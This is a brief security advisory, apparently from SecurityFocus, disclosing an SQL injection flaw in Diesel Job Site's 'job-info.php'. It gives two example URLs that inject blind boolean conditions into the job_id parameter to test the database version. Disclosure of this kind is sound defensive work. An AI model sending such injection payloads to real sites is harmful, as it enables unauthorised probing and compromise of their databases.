Diesel Job Site 'job-info.php' SQL Injection Vulnerability

Attackers can exploit this issue via a browser.

The following example URIs are available:

http://www.example.com/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=5
http://www.example.com/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=4


 

Privacy Statement
Copyright 2010, SecurityFocus